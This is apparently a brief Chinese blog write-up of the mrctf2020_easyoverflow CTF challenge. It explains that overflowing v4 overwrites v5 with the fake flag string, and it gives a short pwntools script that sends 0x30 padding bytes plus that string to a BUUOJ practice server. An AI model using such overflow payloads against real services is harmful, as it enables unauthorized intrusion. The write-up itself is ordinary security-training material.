mrctf2020_easyoverflow

check:
file

从v4写到v5,把v5覆盖为 fake_flag,即可。开始还看走眼了,以为 v5 和 fake_flag 本来就是一样的。
file

如果 check 过了,返回1
file

fake_flag='n0t_r3@11y_f1@g'
file

exp:

from pwn import *

p=remote('node4.buuoj.cn',28904)
payload='a'*0x30+'n0t_r3@11y_f1@g'
p.sendline(payload)
p.interactive()

file

发表评论

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据